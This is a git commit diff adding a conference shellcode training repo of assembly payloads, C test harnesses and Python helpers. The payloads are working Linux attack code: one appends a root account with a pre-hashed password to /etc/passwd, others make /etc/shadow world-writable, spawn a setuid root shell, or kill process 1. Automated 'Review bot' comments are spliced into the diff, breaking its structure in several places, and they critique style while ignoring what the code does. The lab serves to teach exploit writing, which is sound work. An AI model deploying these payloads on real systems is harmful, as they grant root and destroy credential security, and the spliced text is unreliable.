commit cc0cee84ff831bd4ab0d6f0b9cc03434fa9e2c3a Author: Daniel Ashton Date: Mon May 30 09:06:47 2016 +0200 init diff --git a/README b/README new file mode 100644 index 0000000..ee599e2 --- /dev/null +++ b/README @@ -0,0 +1,16 @@ + _____ __ __ ___ _ _ __ ___ ___ ___ _ ____ ____ + / ___/| | | / _]| | | | / ] / \ | \ / _] | | / || \ +( \_ | | | / [_ | | | | / / | || \ / [_ _____ | | | o || o ) + \__ || _ || _]| |___ | |___ / / | O || D || _] || |___ | || | + / \ || | || [_ | || / \_ | || || [_|_____|| || _ || O | + \ || | || || || \ || || || | | || | || | + \___||__|__||_____||_____||_____|\____| \___/ |_____||_____| |_____||__|__||_____| + + +Collection of Shellcode Lab Sessions at from different cons the past years. Consists of PDF Slides and Example codes. + +x86_32 - This is the Shellcode Lab for IA-32 saying 32Bit Intel CPUs +x86_64 - This is the Shellcode Lab for IA-64 saying 64Bit CPUs + +Cheers +dash diff --git a/x86_32/Example_Code/adduser_etc_passwd.asm b/x86_32/Example_Code/adduser_etc_passwd.asm new file mode 100644 index 0000000..2c47e1c --- /dev/null +++ b/x86_32/Example_Code/adduser_etc_passwd.asm @@ -0,0 +1,53 @@ +; shellcode lab @ hack4 +; dash + +BITS 32 +global _start + +_start: +xor eax, eax +xor ebx, ebx +xor ecx, ecx + +mov eax, 5 +push ebx +push 0x64777373 +push 0x61702f63 +push 0x74652f2f +mov ebx, esp +mov ecx, 0x401 +int 0x80 + +; take filedescriptor +xor ebx, ebx +mov ebx, eax + +; write(f_open, line, 24) +xor eax, eax +xor ecx, ecx +mov eax, 4 + +push ecx +push byte 0x0a +push 0x68736162 +push 0x2f6e6962 +push 0x2f3a746f +push 0x6f722f3a +push 0x3a303a30 +push 0x3a494e73 +push 0x386b5a39 +push 0x65736d48 +push 0x42413a72 +push 0x336b6361 +push 0x68316f6e +mov ecx, esp +mov edx, 45 +int 0x80 + +;close maybe?? ah forget that :> + +; exit(23) +mov eax, 1 +mov ebx, 23 +int 0x80 + diff --git a/x86_32/Example_Code/ascii_converter.py b/x86_32/Example_Code/ascii_converter.py new file mode 100644 index 0000000..ef0e2e2 --- /dev/null 
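Review bot: The comment `; write(f_open, line, 24)` in adduser_etc_passwd.asm disagrees with the length actually passed in `mov edx, 45` a few lines below, so a reader who trusts the comment gets the wrong byte count. The comment should state the value the code uses, e.g. `; write(fd, line, 45)`. The `;close maybe?? ah forget that :>` line also records that the descriptor returned by open is never closed; if that is intentional because exit follows immediately, say so instead of leaving it as a question.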
+++ b/x86_32/Example_Code/ascii_converter.py @@ -0,0 +1,21 @@ +#!/usr/bin/env python +# +# ascii converter for shellcoding-lab at hack4 +# ~dash in 2014 +# + +import sys +import binascii + +text = sys.argv[1] + +def usage(): + print "./%s " % (sys.argv[0]) +if len(sys.argv)<2: + usage() + exit() + +val = binascii.hexlify(text[::-1]) + +print "Stringlen: %d" % len(text) +print "String: %s" % val diff --git a/x86_32/Example_Code/ascii_converter2.py b/x86_32/Example_Code/ascii_converter2.py new file mode 100644 index 0000000..b169d52 --- /dev/null +++ b/x86_32/Example_Code/ascii_converter2.py @@ -0,0 +1,29 @@ +#!/usr/bin/env python + +import sys +import binascii + +text = sys.argv[1] + +def usage(): + print "./%s " % (sys.argv[0]) +if len(sys.argv)<2: + usage() + exit() + +val = binascii.hexlify(text[::-1]) + +print "Stringlen: %d" % len(text) +print "String: %s" % val +print +for i in range(len(val)): + if i % 8 == 0: + print "push 0x", + + print "\b%c" % val[i], + i=i+1 + k = i % 8 + if k == 0: + print + + diff --git a/x86_32/Example_Code/bad_setuid_shell.asm b/x86_32/Example_Code/bad_setuid_shell.asm new file mode 100644 index 0000000..558f180 --- /dev/null +++ b/x86_32/Example_Code/bad_setuid_shell.asm @@ -0,0 +1,21 @@ +global _start + +section .text +_start: + +;setuid +xor eax, eax +mov ebx, eax +mov eax, 11 +int 0x80 + +;execve +xor ecx, ecx +push ecx +push 0x69732f2f +push 0x6e69622f +mov ebx, esp +mov edx, 0x00000000 +xor eax, eax +mov eax, 11 +int 0x80 diff --git a/x86_32/Example_Code/chmod_shadow_0bytes.asm b/x86_32/Example_Code/chmod_shadow_0bytes.asm new file mode 100644 index 0000000..e5b7007 --- /dev/null +++ b/x86_32/Example_Code/chmod_shadow_0bytes.asm 
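Review bot: `text = sys.argv[1]` in ascii_converter.py runs before the `if len(sys.argv)<2` check, so invoking the script with no argument raises IndexError instead of printing usage; ascii_converter2.py has the same ordering defect. Move the assignment below the check, i.e. `text = sys.argv[1]` after the `exit()` line. The usage string `"./%s "` appears to have lost its argument placeholder (possibly an extraction artefact), and the `print` statements are Python 2 only, so the `#!/usr/bin/env python` shebang would be clearer as `python2`, as crypt_des_tool.py already does.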
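Review bot: Unlike the other .asm files in this commit, bad_setuid_shell.asm carries no header comment stating what it demonstrates or what the `bad` in its name refers to, so a reader has to diff it against execve_setuid.asm to find out. A header in the style of chmod_shadow_0bytes.asm (`; shellcodelab@hack4` / `; by dash`) plus one line naming the intended lesson would make the file self-explanatory.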
@@ -0,0 +1,27 @@
+; shellcodelab@hack4
+; by dash
+
+BITS 32
+global _start
+
+_start:
+xor eax, eax
+xor ebx, ebx
+xor ecx, ecx
+
+;chmod
+mov ecx, 0x1ff ;0777
+push ebx ;null terminator
+push 0x776f6461 ;/etc/shadow
+push 0x68732f63
+push 0x74652f2f
+mov ebx, esp ;put the address of esp to ebx (shadow)
+mov eax, 15
+int 0x80
+
+;exit
+xor eax, eax
+xor ebx, ebx
+mov eax, 1
+int 0x80
+
diff --git a/x86_32/Example_Code/chmod_shadow_no0.asm b/x86_32/Example_Code/chmod_shadow_no0.asm
new file mode 100644
index 0000000..80127bc
--- /dev/null
+++ b/x86_32/Example_Code/chmod_shadow_no0.asm
@@ -0,0 +1,26 @@
+; shellcode-lab@hack4
+; by dash
+
+BITS 32
+global _start
+
+_start:
+xor eax, eax
+xor ebx, ebx
+xor ecx, ecx
+
+;chmod
+mov cx, 0x1ff ;0777
+push ebx ;null terminator
+push 0x776f6461 ;/etc/shadow
+push 0x68732f63
+push 0x74652f2f
+mov ebx, esp ;put the address of esp to ebx (shadow)
+mov al, 15
+int 0x80
+
+;exit
+xor eax, eax
+xor ebx, ebx
+mov al, 1
+int 0x80
diff --git a/x86_32/Example_Code/crypt_des_tool.py b/x86_32/Example_Code/crypt_des_tool.py
new file mode 100644
index 0000000..df68606
--- /dev/null
+++ b/x86_32/Example_Code/crypt_des_tool.py
@@ -0,0 +1,19 @@
+#!/usr/bin/env python2
+#
+# crypt des tool for shellcoding lab at hack4
+# ~dash
+
+import sys
+import crypt
+
+def usage():
+ print "%s " % (sys.argv[0])
+
+if len(sys.argv)<2:
+ usage()
+ exit()
+
+password = sys.argv[1]
+pw = crypt.crypt(password,'AB')
+print "Password: %s" % pw
+
diff --git a/x86_32/Example_Code/shell.c b/x86_32/Example_Code/shell.c
new file mode 100644
index 0000000..ac0e9d0
--- /dev/null
+++ b/x86_32/Example_Code/shell.c
@@ -0,0 +1,20 @@
+/* shell.c
+ simple shell for shellcoding-lab at hack4 0x1
+ probably ripped somewhere
+ ~dash
+*/
+
+#include
+#include
+#include
+
+
+int main(){
+
+ char *args[2];
+
+ setuid(0);
+ args[0] = "/bin/sh";
+ args[1] = NULL;
+ execve(args[0], args, NULL);
+}
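Review bot: `crypt.crypt(password,'AB')` in crypt_des_tool.py hard-codes the salt, so every run produces the same hash for the same password; if the fixed salt is deliberate so that lab output is reproducible, a comment saying so would stop the tool being reused as if it produced properly salted hashes. The two-character salt also selects traditional DES crypt, which only uses the first eight characters of the password, and that limit is worth stating next to the call. The usage string `"%s "` looks like it lost its argument placeholder, possibly in extraction.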
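Review bot: In shell.c neither `setuid(0)` nor `execve(args[0], args, NULL)` has its return value checked, and `main` falls off the end without a return, so when execve fails the program exits silently with an unspecified status. The minimal fix is `if (execve(args[0], args, NULL) == -1) { perror("execve"); return 1; }` as the last statement of `main`; `perror` needs `<stdio.h>`, and since the three `#include` lines show no header names on this page, confirm that against the file. The header comment `probably ripped somewhere` should either name the source or be dropped.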
diff --git a/x86_32/Example_Code/skeleton_mmap.c b/x86_32/Example_Code/skeleton_mmap.c
new file mode 100644
index 0000000..d656446
--- /dev/null
+++ b/x86_32/Example_Code/skeleton_mmap.c
@@ -0,0 +1,26 @@
+#include
+#include
+
+char shellcode[] = "";
+
+int main(int argc, char **argv)
+{
+ // Allocate some read-write memory
+ void *mem = mmap(0, sizeof(shellcode), PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
+
+ // Copy the shellcode into the new memory
+ memcpy(mem, shellcode, sizeof(shellcode));
+
+ // Make the memory read-execute
+ mprotect(mem, sizeof(shellcode), PROT_READ|PROT_EXEC);
+
+ // Call the shellcode
+ int (*func)();
+ func = (int (*)())mem;
+ (int)(*func)();
+
+ // Now, if we managed to return here, it would be prudent to clean up the memory:
+ munmap(mem, sizeof(shellcode));
+
+ return 0;
+}
diff --git a/x86_32/Example_Code/skeleton_oldstyle.c b/x86_32/Example_Code/skeleton_oldstyle.c
new file mode 100644
index 0000000..cc3f9dc
--- /dev/null
+++ b/x86_32/Example_Code/skeleton_oldstyle.c
@@ -0,0 +1,15 @@
+#include
+#include
+#include
+
+char shellcode[] = "";
+
+int main(void)
+{
+ int *ret;
+
+ printf("%d\n",strlen(shellcode));
+ ret = (int *)&ret+2;
+ *ret = (int)shellcode;
+return 0;
+}
diff --git a/x86_32/Shellcode-Lab32_0x01.pdf b/x86_32/Shellcode-Lab32_0x01.pdf
new file mode 100644
index 0000000..3ad4a41
Binary files /dev/null and b/x86_32/Shellcode-Lab32_0x01.pdf differ
diff --git a/x86_64/Example_Code/8bit.asm b/x86_64/Example_Code/8bit.asm
new file mode 100644
index 0000000..cd3f45a
--- /dev/null
+++ b/x86_64/Example_Code/8bit.asm
@@ -0,0 +1,18 @@
+; 8 bit registers 'undocumented', test
+; dash@hack4.org
+; May 2016
+;
+; wikipedia, shellcode trainings no access to certain cpu registers in 8 bit mode
+; however, they are addressable
+; just adding right now a l to 16bit registers
+;
+
+BITS 64
+
+global _start
+_start:
+
+mov spl, 1
+mov bpl, 2
+mov sil, 3
+mov dil, 4
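Review bot: In skeleton_mmap.c `mmap` can return `MAP_FAILED` and `mprotect` can return -1, but neither result is checked, so on failure the `memcpy` writes through an invalid pointer and the call through `func` jumps into memory that was never made executable. Add `if (mem == MAP_FAILED) { perror("mmap"); return 1; }` after the mmap call and `if (mprotect(mem, sizeof(shellcode), PROT_READ|PROT_EXEC) == -1) { perror("mprotect"); return 1; }` in place of the bare call (`perror` needs `<stdio.h>`; the `#include` names are not visible on this page). `sizeof(shellcode)` counts the terminating NUL, which is harmless but worth a comment, and `(int)(*func)();` discards its result, so `(void)func();` states the intent better. The RW-then-RX sequence already respects W^X; a comment saying that is why the two steps are separate would keep a later edit from collapsing them into one mapping.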
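Review bot: In skeleton_oldstyle.c `printf("%d\n",strlen(shellcode))` passes a `size_t` for `%d`, which is undefined behaviour; use `printf("%zu\n", strlen(shellcode));`. The two lines that follow, `ret = (int *)&ret+2;` and `*ret = (int)shellcode;`, assume one specific compiler frame layout and a 32-bit pointer, so the file only works for one build configuration and truncates the pointer on a 64-bit build; the sibling x86_64 skeleton.c at least records its preconditions in its header comment, and this file should state its own (32-bit build, the frame layout it relies on) the same way. `return 0;` is also the only unindented statement in the body.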
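Review bot: 8bit.asm ends after `mov dil, 4` with no exit system call, so execution runs off the end of `.text` and the process is killed by a fault once the demo instructions have run; the same applies to byte_placement_r10.asm, byte_placement_rax.asm, clear_register.asm, push.asm, push_mov.asm and xchg.asm in this commit. If that is intended because these files are meant to be stepped through in a debugger, a header line such as `; no exit: step through in a debugger, running it directly will fault` would save each reader the surprise. The header's `just adding right now a l to 16bit registers` could also say what the result is: `spl`, `bpl`, `sil` and `dil` name the low byte of those registers.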
diff --git a/x86_64/Example_Code/byte_placement_r10.asm b/x86_64/Example_Code/byte_placement_r10.asm
new file mode 100644
index 0000000..caa4fa6
--- /dev/null
+++ b/x86_64/Example_Code/byte_placement_r10.asm
@@ -0,0 +1,22 @@
+; shellcode-lab64bit
+; dash@hack4.org
+; byte placements on 64 bit - example for new register r10
+BITS 64
+global _start
+
+_start:
+
+; former general purpose register
+sub r10, r10
+
+mov r10, 0x4142434445464748
+sub r10, r10
+
+mov r10d, 0x41424344
+sub r10d, r10d
+
+mov r10w, 0x4142
+sub r10w, r10w
+
+mov r10b,0x42
+sub r10b, r10b
diff --git a/x86_64/Example_Code/byte_placement_rax.asm b/x86_64/Example_Code/byte_placement_rax.asm
new file mode 100644
index 0000000..a470393
--- /dev/null
+++ b/x86_64/Example_Code/byte_placement_rax.asm
@@ -0,0 +1,28 @@
+; shellcode-lab64bit
+; dash@hack4.org
+; byte placements on 64 bit - example
+BITS 64
+global _start
+
+_start:
+
+; former general purpose register, example
+; sub is used to clear out the register
+sub rax, rax
+
+mov rax, 0x4142434445464748
+sub rax, rax
+
+mov eax, 0x41424344
+sub eax, eax
+
+; address 16bit
+mov ax, 0x4142
+
+; overwrite the higher byte of ax
+; 0x4142 gets to 0x2d42
+mov ah,0x2d
+sub ah, ah
+
+mov al,0x41
+sub al, al
diff --git a/x86_64/Example_Code/clear_register.asm b/x86_64/Example_Code/clear_register.asm
new file mode 100644
index 0000000..b17424f
--- /dev/null
+++ b/x86_64/Example_Code/clear_register.asm
@@ -0,0 +1,22 @@
+; shellcode-lab64
+; dash@hack4.org
+;
+
+; some example to zero-out a register
+BITS 64
+global _start
+_start:
+
+xor rax, rax ; initial clearing - classic xor
+mov rax, 0xDEADBEEF
+sub rax, rax ; sub opcode
+
+mov rax, 0xF00DBABE
+xor rax, rax ; classic xor
+
+; check value of register and add or sub from that
+; let's assume 29A is in the register rcx
+sub rcx, rcx
+mov rcx, 0x29A
+sub rcx, 666
+; zero'd
diff --git a/x86_64/Example_Code/execve.asm b/x86_64/Example_Code/execve.asm
new file mode 100644
index 0000000..ba4b909
--- /dev/null
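Review bot: In byte_placement_r10.asm the `sub r10d, r10d` line clears all 64 bits of r10, because a 32-bit destination is zero-extended into the full register on x86-64, whereas `sub r10w, r10w` and `sub r10b, r10b` leave the upper bits untouched — but nothing in the file says so, and `; former general purpose register` reads as if r10 were a legacy register rather than one of the new r8–r15. The same point applies to `sub eax, eax` versus `sub ah, ah` and `sub al, al` in byte_placement_rax.asm. A comment on the 32-bit line such as `; a 32-bit write zero-extends into the full 64-bit register` and one on the 16/8-bit lines noting that they only clear the low part would make the intended lesson explicit.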
+++ b/x86_64/Example_Code/execve.asm
@@ -0,0 +1,21 @@
+BITS 64
+global _start
+
+_start:
+
+xor rax, rax
+
+push rax ; null terminator for the string
+mov rbx, 0x68732f6e69622f2f ; //bin/sh backwards
+push rbx ;
+mov rdi, rsp ; move address from stack pointer to first argument
+
+push rax
+push rdi ; actually we would not need this one
+mov rsi, rsp ; move the address to the 2nd argument
+
+mov rdx, rax ; no envp necessary
+
+mov al,0x3B ; execve into rax
+
+syscall
diff --git a/x86_64/Example_Code/execve_setuid.asm b/x86_64/Example_Code/execve_setuid.asm
new file mode 100644
index 0000000..5cf7cab
--- /dev/null
+++ b/x86_64/Example_Code/execve_setuid.asm
@@ -0,0 +1,29 @@
+BITS 64
+global _start
+
+_start:
+
+xor rax, rax
+push rax ; push the cleared register
+pop rdi ; pop the zer0z into 1st argument
+
+add al,0x69 ; setuid 105 or 0x69h
+syscall ; call setuid(0)
+
+
+xor rax, rax
+
+push rax ; null terminator for the string
+mov rbx, 0x68732f6e69622f2f ; //bin/sh backwards
+push rbx ;
+mov rdi, rsp ; move address from stack pointer to first argument
+
+push rax
+push rdi ; actually we would not need this one
+mov rsi, rsp ; move the address to the 2nd argument
+
+mov rdx, rax ; no envp necessary
+
+mov al,0x3B ; execve into rax
+
+syscall
diff --git a/x86_64/Example_Code/exit.asm b/x86_64/Example_Code/exit.asm
new file mode 100644
index 0000000..a038f6e
--- /dev/null
+++ b/x86_64/Example_Code/exit.asm
@@ -0,0 +1,14 @@
+; shellcode lab 64Bit
+; exit example as it should be ;)
+; dsah@hack4.org
+;
+BITS 64
+global _start
+
+_start:
+
+xor rax,rax
+xor rdx,rdx
+mov al,0x3C
+mov dil,4
+syscall
diff --git a/x86_64/Example_Code/exit_nulls.asm b/x86_64/Example_Code/exit_nulls.asm
new file mode 100644
index 0000000..2ed69e0
--- /dev/null
+++ b/x86_64/Example_Code/exit_nulls.asm
@@ -0,0 +1,16 @@
+; shellcode-lab 64Bit
+; dash@hack4.org
+; exit code with null bytes
+;
+
+BITS 64
+
+global _start
+
+_start:
+
+xor rax,rax
+xor rdx,rdx
+mov rax,0x3C
+mov rdx,4
+syscall
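Review bot: In exit.asm `mov dil,4` makes this an exit(4), but the header only says `exit example as it should be ;)`, so the chosen status is undocumented; a trailing `; exit status 4` on that line and `; SYS_exit` on `mov al,0x3C` would match the per-line commenting style of execve.asm. The author line reads `dsah@hack4.org` where every other file in the commit says `dash@hack4.org`.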
diff --git a/x86_64/Example_Code/kill.asm b/x86_64/Example_Code/kill.asm
new file mode 100644
index 0000000..9289643
--- /dev/null
+++ b/x86_64/Example_Code/kill.asm
@@ -0,0 +1,27 @@
+; shellcode-lab 64Bit
+; dash@hack4.org
+; kill + exit
+;
+
+
+BITS 64
+global _start
+
+_start:
+
+xor rax, rax
+xor rdi, rdi
+xor rsi, rsi
+
+
+mov dil, 1368
+mov sil,9
+mov al, 62
+syscall
+
+xor rax, rax
+xor rdi, rdi
+
+add dil, 4
+mov al, 60
+syscall
diff --git a/x86_64/Example_Code/kill_noexit.asm b/x86_64/Example_Code/kill_noexit.asm
new file mode 100644
index 0000000..cdf2db3
--- /dev/null
+++ b/x86_64/Example_Code/kill_noexit.asm
@@ -0,0 +1,18 @@
+; shellcode-lab64bit
+; dash@hack4.org
+; don't execute that as root, as long as adjusted
+;
+
+BITS 64
+global _start
+
+_start:
+
+xor rax, rax
+xor rdi, rdi
+xor rsi, rsi
+
+mov dil, 1 ; you might not want to run that as root
+mov sil,9
+mov al, 62
+syscall
diff --git a/x86_64/Example_Code/push.asm b/x86_64/Example_Code/push.asm
new file mode 100644
index 0000000..15ee9ec
--- /dev/null
+++ b/x86_64/Example_Code/push.asm
@@ -0,0 +1,16 @@
+; shellcode-lab64
+; dash@hack4.org
+; push example and 8byte fun on 64bit architecture
+;
+
+BITS 64
+
+global _start
+_start:
+
+push byte 0x41
+push word 0x4142
+push dword 0x41424344
+; let's comment that out
+; comment it in to see the compile error
+;push 0x4142434445464748
diff --git a/x86_64/Example_Code/push_mov.asm b/x86_64/Example_Code/push_mov.asm
new file mode 100644
index 0000000..44e4e1a
--- /dev/null
+++ b/x86_64/Example_Code/push_mov.asm
@@ -0,0 +1,14 @@
+; shellcode-lab64
+; dash@hack4.org
+; push example and 8byte fun on 64bit architecture
+; use mov to bring up your 8byte value on the stack
+;
+
+BITS 64
+
+global _start
+_start:
+
+xor rax, rax ; clear register
+mov rax, 0x4142434445464748 ; place 8byte in register rax
+push rax ; push it onto the stack
diff --git a/x86_64/Example_Code/skeleton.c b/x86_64/Example_Code/skeleton.c
new file mode 100644
index 0000000..780761b
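Review bot: In kill.asm `mov dil, 1368` cannot do what it reads as: `dil` is an 8-bit register, so 1368 is out of range and NASM warns and truncates the immediate, meaning the signal is sent to a different process id than the source suggests. Either the example should use a value that fits in a byte, as kill_noexit.asm does with `mov dil, 1`, or the line needs a comment stating that the out-of-range value is deliberate to demonstrate the truncation. The `add dil, 4` before the second syscall is also undocumented; `; exit(4)` would make clear it is the exit status.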
--- /dev/null
+++ b/x86_64/Example_Code/skeleton.c
@@ -0,0 +1,17 @@
+/* shellcode-lab 64Bit
+ dash@hack4.org
+
+ use -z execstack
+ or set char code to const
+*/
+
+#include
+#include
+
+unsigned char code[] ="shellcode wants to be placed here!";
+main()
+{
+ printf("Shellcode Len: %d\n", (int)strlen(code));
+ int (*ret)() = (int(*)())code;
+ ret();
+}
diff --git a/x86_64/Example_Code/xchg.asm b/x86_64/Example_Code/xchg.asm
new file mode 100644
index 0000000..990a523
--- /dev/null
+++ b/x86_64/Example_Code/xchg.asm
@@ -0,0 +1,20 @@
+; xchg example code
+; dash@hack4.org
+; shellcode lab
+; may 2016
+
+BITS 64
+global _start
+
+_start:
+
+xor rax, rax
+xor rbx, rbx
+
+mov rax, 0x29A ; http://web.textfiles.com/ezines/29A/
+mov rbx, 0x539
+mov r10, 0xBEEFBEEFBEEFBEEF
+xchg rax, r10
+xchg r10, r9
+xchg rbx, rax
+xchg rdi,rsp
diff --git a/x86_64/Shellcode-Lab64_0x01.pdf b/x86_64/Shellcode-Lab64_0x01.pdf
new file mode 100644
index 0000000..497f348
Binary files /dev/null and b/x86_64/Shellcode-Lab64_0x01.pdf differ
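Review bot: In skeleton.c `main()` with no return type relies on implicit int, which C99 removed and newer GCC releases reject by default, so the file will not build with a current default toolchain; write `int main(void)`. `strlen(code)` passes an `unsigned char *` where `const char *` is expected, a pointer-sign warning today, and `strlen((const char *)code)` fixes it. The header's `or set char code to const` is presented as an alternative to `-z execstack`, but whether const data ends up in an executable segment depends on the linker's layout defaults, so that line should be hedged or dropped. The two `#include` lines show no header names on this page, presumably an extraction artefact.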
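Review bot: The final `xchg rdi,rsp` in xchg.asm leaves rsp holding whatever rdi contained, and nothing in the file initialises rdi, so the process is left without a usable stack; likewise `xchg r10, r9` swaps in an uninitialised r9, which nothing explains. If both are deliberate demonstrations of register swapping, a comment saying so and a final `; rsp is now invalid, step through under a debugger` would keep a reader from running it as a normal binary. There is no exit system call either, so the process faults at the end regardless.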